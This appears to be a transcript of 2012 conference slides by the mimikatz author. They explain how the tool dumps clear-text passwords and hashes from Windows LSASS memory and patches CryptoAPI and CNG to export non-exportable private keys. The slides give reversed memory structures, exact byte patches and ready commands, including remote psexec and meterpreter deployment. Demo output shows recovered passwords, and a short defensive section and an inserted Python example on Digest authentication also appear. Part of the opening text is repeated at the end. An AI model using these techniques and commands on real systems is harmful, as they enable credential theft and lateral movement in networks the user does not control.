Not for all logons on NT5 (an unlock may be needed)
From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
– For password auth:
  • the password hash is the shared secret, but the password is kept in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
    – NTLM hash on client…
    – the KDC sent it back as a gift
mimikatz sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
– This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take advantage of its keys when we called it.
Could it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys initialized by LSASS
– When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz sekurlsa LsaEncryptMemory – NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
lsasrv globals holding the keys:
g_cbRandomKey : DWORD (256)
g_pRandomKey  : BYTE[g_cbRandomKey]
g_pDESXKey    : BYTE[144]
g_Feedback    : BYTE[8]
[diagram: these globals are read from lsasrv inside lsass and copied… into the lsasrv loaded by mimikatz, so its LsaUnprotectMemory works on the same keys]
mimikatz sekurlsa LsaEncryptMemory – NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
lsasrv globals holding the keys:
InitializationVector : BYTE[16]
h3DesKey, hAesKey    : handles to a KIWI_BCRYPT_KEY, whose cle member points to the KIWI_BCRYPT_KEY_DATA with the key material
[diagram: the IV and both key structures are read from lsasrv inside lsass and copied… into mimikatz]
typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa – memo
Security Packages
Package          Symbol                                 Type
tspkg            tspkg!TSGlobalCredTable                RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                  LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList     LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList          LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable   RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                LIST_ENTRY
                 lsasrv!LogonSessionListCount           ULONG
Protection Keys
Key     NT 5 symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback
Key     NT 6 symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa – memo
Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC) – Traitement du Kiwi (Aug  2 2012 01:32:28)
// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur : Gentil Kiwi
	 * Domaine     : vm-w8-rp-x
	 * Hash LM     : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM   : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp :
	 n.t. (LUID KO)
mimikatz sekurlsa – what we can do?
Basics:
– No physical access to the computer (first step to pass the hash, then pass the pass)
– No admin rights, system rights, debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass the hash leaves traces and can lock accounts
– No admin rights, system rights, debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth:
– Force strong authentication (SmartCard & Token) ($ €)
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take every opportunity to drop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto – what is it?
A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI, in the mimikatz context
  • CNG, in the LSASS context (again ;))
mod_mimikatz_crypto
mimikatz crypto – how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the users' master keys and/or passwords
Computers/Users can load their own keys because they have enough secrets to do it (e.g. an open session)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
Password and popup: a constraint for most users, unavailable for computer keys
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto capi – how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, yourappshere…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz crypto capi – how it's exported ( level)
[diagram: Process → CryptoAPI and RSA CSP: Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes → Exported Key; no → NTE_BAD_KEY_STATE ("PLAYSKOOL")]
mimikatz crypto patchcapi – because I own my process
When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey
This function does all the work to prepare the export and checks whether the key is exportable
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
	Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
	Provider      : Microsoft Enhanced Cryptographic Provider v1.0
	Type          : AT_KEYEXCHANGE
	Exportabilité : NON
	Taille clé    : 2048
	Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
	Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(Exportable? → no)
mimikatz crypto patchcapi – because I own my process
So what? A module in my own process tells me that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi – demo time
Import, export, import as not exportable… export
mimikatz crypto patchcapi – limitations
Because:
– I'm lazy
– I've seen RSA keys in the majority of real-life cases
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz crypto cng – how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not performed in the "user" process context
Processes use RPC to call the "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz crypto cng – how it's exported ( level)
[diagram: Process → CNG → RPC → KeyIso Service (LSASS Process): Load Private Key → DPAPI Decode → Ask to export Key → Exportable? yes → Exported Key; no → NTE_NOT_SUPPORTED ("PLAYSKOOL"). On NT6, LSASS is a System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) -> ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.

    mimikatz # crypto::exportKeys
    [user]
    Clés CNG :
     - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.

[Slide annotation next to the refused export: Exportable?]
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, the checks and the keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...

    .text:6C815210  75 1C    jnz short continue_key_export
    .text:6C815210  EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable... export again!
mimikatz :: crypto :: patchcng :: limitations
The patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA?)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
- Yeah, like the good old certutil

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificat 1 ================
    [...]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    La clé privée NE PEUT PAS être exportée
    Succès du test de chiffrement
    CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
    CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

    C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
    ================ Certificat 1 ================
    [...]
    Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
      Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
      Fournisseur = Microsoft Software Key Storage Provider
    Succès du test de chiffrement
    CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:

    mimikatz crypto::patchcapi crypto::exportCertificates exit

    psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit

    mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop

    mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: what prevents it is preventing access to the accounts / computer - no admin, no admin, no admin...
Basics
- Use smartcards / tokens for user certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementations (Lenovo, Dell, ...) of TPM CSP / KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • ...
- ...
mimikatz :: that's all folks
Thanks to:
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft for always considering it as normal / acceptable
- Security friends / community for their ideas & challenges
  • nagual, newsoft, mubix, ...
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog:     http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source:   https://code.google.com/p/mimikatz
email:    benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg :: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on tspkg!TSGlobalCredTable -> KIWI_TS_CREDENTIAL -> pTsPrimary -> KIWI_TS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
        PVOID unk0;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Password;
    } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_TS_CREDENTIAL {
    #ifdef _M_X64
        BYTE unk0[108];
    #elif defined _M_IX86
        BYTE unk0[64];
    #endif
        LUID LocallyUniqueIdentifier;
        PVOID unk1;
        PVOID unk2;
        PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
    } KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;
mimikatz :: sekurlsa :: tspkg :: demo time

    mimikatz # sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http / https is not cool
mimikatz :: sekurlsa :: wdigest :: what is it?
"Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network [...]" - Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
"Common Digest Authentication Scenarios - Authenticated client access to a Web site - Authenticated client access using SASL - Authenticated client access with integrity protection to a directory service using LDAP" - Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
- No password over the network, just hashes
- No reversible password in Active Directory, hashes for each realm
  • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest :: what is it?
We speak about hashes, but which hashes? H = MD5(HA1:nonce:[...]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[...])
Even after logon, HA1 may change... the realm comes from the server side and cannot be determined before the Windows logon.
The WDigest provider must therefore keep the elements needed to compute responses for different servers:
- Username
- Realm (from server)
- Password
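The Digest computation above, as an added example that is not part of the talk: a small RFC 2617 client-side implementation showing why a client that must answer challenges from arbitrary realms has to keep either the password or one precomputed HA1 per realm. The first challenge reuses the RFC 2617 section 3.5 test vector; the second realm, its nonce and all helper names are constructed for this example.

```python
"""RFC 2617 Digest access authentication, client side.

Added example (not part of the ASFWS 2012 slides): shows why a provider
such as WDigest must keep the password (or one HA1 per realm) in memory.
"""
import hashlib
import re

# Matches key="quoted value" or key=bare_value inside a Digest challenge.
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def compute_ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password). The realm is chosen by the server."""
    return md5_hex(f"{username}:{realm}:{password}")


def compute_ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth."""
    return md5_hex(f"{method}:{uri}")


def compute_response(ha1: str, nonce: str, nc: str, cnonce: str, qop: str, ha2: str) -> str:
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), the value sent back to the server."""
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def parse_challenge(www_authenticate: str) -> dict:
    """Parse the parameter list of a 'WWW-Authenticate: Digest ...' header value."""
    scheme, _, params = www_authenticate.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest challenge")
    return {key: quoted or bare for key, quoted, bare in _PARAM_RE.findall(params)}


def _pick_qop(challenge: dict) -> str:
    # The server may offer several qop values; this client only implements 'auth'.
    offered = [q.strip() for q in challenge.get("qop", "auth").split(",")]
    if "auth" not in offered:
        raise ValueError("server does not offer qop=auth")
    return "auth"


def answer_with_password(username, password, header, method, uri, nc, cnonce):
    """Client keeping the clear password: HA1 is recomputed for whatever realm the server sends."""
    ch = parse_challenge(header)
    ha1 = compute_ha1(username, ch["realm"], password)
    return compute_response(ha1, ch["nonce"], nc, cnonce, _pick_qop(ch), compute_ha2(method, uri))


def answer_with_ha1_table(ha1_by_realm, header, method, uri, nc, cnonce):
    """Client keeping only precomputed HA1 values (one per realm): an unknown realm cannot be answered."""
    ch = parse_challenge(header)
    ha1 = ha1_by_realm.get(ch["realm"])
    if ha1 is None:
        return None
    return compute_response(ha1, ch["nonce"], nc, cnonce, _pick_qop(ch), compute_ha2(method, uri))


# Constructed inputs: the RFC 2617 section 3.5 example challenge, plus a second
# realm the client has never seen before (nonce and realm made up for this example).
RFC2617_CHALLENGE = ('Digest realm="testrealm@host.com", qop="auth,auth-int", '
                     'nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", '
                     'opaque="5ccc069c403ebaf9f0171e9517f40e41"')
OTHER_REALM_CHALLENGE = 'Digest realm="other.example", qop="auth", nonce="0123456789abcdef"'


def demo() -> dict:
    user, password = "Mufasa", "Circle Of Life"
    method, uri, nc, cnonce = "GET", "/dir/index.html", "00000001", "0a4f113b"
    # What a client could keep instead of the password: one HA1 per realm it already knows.
    ha1_table = {"testrealm@host.com": compute_ha1(user, "testrealm@host.com", password)}
    return {
        "password_known_realm": answer_with_password(user, password, RFC2617_CHALLENGE, method, uri, nc, cnonce),
        "table_known_realm": answer_with_ha1_table(ha1_table, RFC2617_CHALLENGE, method, uri, nc, cnonce),
        "password_new_realm": answer_with_password(user, password, OTHER_REALM_CHALLENGE, method, uri, nc, cnonce),
        "table_new_realm": answer_with_ha1_table(ha1_table, OTHER_REALM_CHALLENGE, method, uri, nc, cnonce),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:22s} {value}")
```

The password-holding client answers both realms, the HA1-table client only the realm it already knew; that is the trade-off behind WDigest keeping the password in LSASS.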
mimikatz :: sekurlsa :: wdigest :: theory
This time we know:
- that WDigest keeps the password in memory « by protocol » for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- Hypothesis seems verified
LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest
- SpAcceptCredentials takes the clear password in its args
  • Protects it with LsaProtectMemory
  • Updates or inserts data in the double linked list wdigest!l_LogSessList

    .text:7409D151  _DigestCalcHA1@8          call dword ptr [eax+0B4h]
    .text:74096C69  _SpAcceptCredentials@16   call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest :: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for the LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_WDIGEST_LIST_ENTRY {
        struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
        struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
        DWORD UsageCount;
        struct _KIWI_WDIGEST_LIST_ENTRY *This;
        LUID LocallyUniqueIdentifier;
        /* [...] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
        /* [...] */
    } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest :: demo time

    mimikatz # sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp :: how?
Actually, so far I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbols searching
~ Boring ~... let's be more brutal this time: set a WinDBG trap!

    0: kd> !process 0 0 lsass.exe
    PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
        DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
        Image: lsass.exe
    0: kd> .process /i 83569040
    You need to continue execution (press 'g' <enter>) for the context
    to be switched. When the debugger breaks in again, you will be in
    the new process context.
    0: kd> g
    Break instruction exception - code 80000003 (first chance)
    nt!RtlpBreakWithStatusInstruction:
    814b39d0 cc              int     3
    0: kd> .reload /user
    Loading User Symbols
    0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
    0: kd> g
mimikatz :: sekurlsa :: livessp :: how?
Let's log in with a Live account on Windows 8.
After the credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).

    lsasrv!LsaProtectMemory
    livessp!LiveMakeSupplementalCred
    livessp!LiveMakeSecPkgCredentials
    livessp!LsaApLogonUserEx2
    livessp!SpiLogonUserEx2

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials

    1: kd> uf /c livessp!LsaApLogonUserEx2
    livessp!LsaApLogonUserEx2 (74781536)
      [...]
      livessp!LsaApLogonUserEx2+0x560 (74781a96):
        call to livessp!LiveCreateLogonSession (74784867)

[Annotation on the first call stack: our LiveSSP provider]
Yeah! Pass the hash capability with a Live account too...
A Live user can log on through RDP via SSO.
mimikatz :: sekurlsa :: livessp :: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for the LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds -> KIWI_LIVESSP_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
        DWORD isSupp;
        DWORD unk0;
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

    typedef struct _KIWI_LIVESSP_LIST_ENTRY {
        struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
        struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
        DWORD unk4;
        DWORD unk5;
        PVOID unk6;
        LUID LocallyUniqueIdentifier;
        LSA_UNICODE_STRING UserName;
        PVOID unk7;
        PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
    } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account.
After the credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList

    lsasrv!LsaProtectMemory
    kerberos!KerbHideKey
    kerberos!KerbCreatePrimaryCredentials
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    kerberos!KerbHidePassword
    kerberos!KerbCreateLogonSession
    kerberos!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    msv1_0!NlpAddPrimaryCredential
    msv1_0!SspAcceptCredentials
    msv1_0!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    wdigest!SpAcceptCredentials

    lsasrv!LsaProtectMemory
    tspkg!TSHidePassword
    tspkg!SpAcceptCredentials

[Annotations: the KerbHidePassword stack is the Kerberos part for the password; the KerbHideKey stack is the Kerberos ticket part? Maybe ;)]
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
        DWORD unk0;
        PVOID unk1;
        PVOID unk2;
        PVOID unk3;
    #ifdef _M_X64
        BYTE unk4[32];
    #elif defined _M_IX86
        BYTE unk4[20];
    #endif
        LUID LocallyUniqueIdentifier;
    #ifdef _M_X64
        BYTE unk5[44];
    #elif defined _M_IX86
        BYTE unk5[36];
    #endif
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[Diagram: LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for the LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear]

    typedef struct _KIWI_KERBEROS_LOGON_SESSION {
        struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
        struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
        DWORD UsageCount;
        PVOID unk0;
        PVOID unk1;
        PVOID unk2;
        DWORD unk3;
        DWORD unk4;
        PVOID unk5;
        PVOID unk6;
        PVOID unk7;
        LUID LocallyUniqueIdentifier;
    #ifdef _M_IX86
        DWORD unk8;
    #endif
        DWORD unk9;
        DWORD unk10;
        PVOID unk11;
        DWORD unk12;
        DWORD unk13;
        PVOID unk14;
        PVOID unk15;
        PVOID unk16;
        /* [...] */
        LSA_UNICODE_STRING UserName;
        LSA_UNICODE_STRING Domaine;
        LSA_UNICODE_STRING Password;
    } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo:

    mimikatz # sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos :: "hu?"
OK. It works...
But why?
Not at all logons on NT5 (an unlock may be needed)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol...
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic...
- For password auth
  • password hash for the shared secret, but keeping the password in memory
- For full smartcard auth
  • No password on client
  • No hash on client
- NTLM hash on client...
- the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) in the LSASS process, to take advantage of its keys when we called it.
Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can use lsasrv.dll too, and "imports" the keys LSASS initialized
